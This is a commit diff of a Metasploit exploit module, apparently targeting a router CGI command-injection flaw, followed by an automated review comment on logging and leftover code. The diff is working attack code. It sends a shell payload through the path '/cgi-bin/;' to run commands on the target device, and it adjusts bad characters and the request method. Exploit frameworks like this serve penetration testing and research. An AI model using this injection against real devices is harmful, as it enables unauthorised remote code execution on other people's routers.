parent
3fac632ce1
commit
63d1de9acd
|
@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true
|
||||
#'EncoderType' => Msf::Encoder::Type::CmdUnixIfs,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x20"
|
||||
}
|
||||
))
|
||||
|
||||
|
@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
|
||||
def exploit
|
||||
is_vuln = check
|
||||
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
||||
cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||
#str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
|
||||
|
||||
print_status('Sending encoded command...')
|
||||
vprint_status("Encoded command: #{str}")
|
||||
send_request_raw({ 'uri' => "/cgi-bin/;#{str}" })
|
||||
vprint_status("Encoded command: #{cmd}")
|
||||
send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
|
||||
|
||||
print_status('Giving the handler time to run...')
|
||||
handler
|
||||
|
||||
select(nil, nil, nil, 10.0)
|
||||
sleep(10)
|
||||
end
|
||||
end
|
||||
|
|
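Review bot: In `exploit`, the two status strings still say "encoded" (`'Sending encoded command...'` and `"Encoded command: #{cmd}"`), although the hex/echo wrapping now appears to be commented out and `cmd` is just `payload.encoded`. Verbose logs will therefore mislead anyone reconstructing what was actually sent; `vprint_status("Command: #{cmd}")` would match the new behaviour. The commented-out remnants (`# .unpack(...)`, `#str = ...`, and `#'EncoderType' => ...` in the first hunk) should be deleted rather than kept, and the new `'BadChars' => "\x20"` deserves a one-line comment such as `# a space cannot appear in the request path`, if that is the reason for it. `is_vuln = check` is assigned but never read in the visible lines, so either drop the assignment or return early when the check does not report the target as vulnerable. Which side each line belongs to is inferred from the rendered page, since the markers are lost, and the class body begins outside these hunks.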